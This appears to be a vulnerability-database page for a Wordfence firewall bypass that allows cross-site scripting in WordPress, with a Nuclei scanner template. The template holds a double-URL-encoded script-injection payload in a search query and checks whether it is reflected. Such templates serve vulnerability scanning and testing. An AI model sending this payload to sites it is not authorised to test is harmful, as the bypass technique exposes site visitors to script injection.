wordpress-wordfence-waf-bypass-xss: Wordpress Wordfence - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Wordpress Wordfence | POC: 已公开

漏洞描述

Wordpress Wordfence is vulnerable to cross-site scripting.

PoC代码[已公开]

id: wordpress-wordfence-waf-bypass-xss

info:
  name: Wordpress Wordfence - Cross-Site Scripting
  author: hackergautam
  severity: medium
  description: Wordpress Wordfence is vulnerable to cross-site scripting.
  reference:
    - https://twitter.com/naglinagli/status/1382082473744564226
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: wordpress,wordfence,xss,bypass,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - <script>alert(document.domain)</script>
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022009e4bc9299d4cc11a6d5e5426ec7e4384c1670868e8cd0f7d0be1326c3b407f8022100b72c73f9ba9d8d7944d4ab93b7fddec21c96149dd0e1f2eb3b8abc30968b3a37:922c64590222798bb761d5b6d8e72950

相关漏洞推荐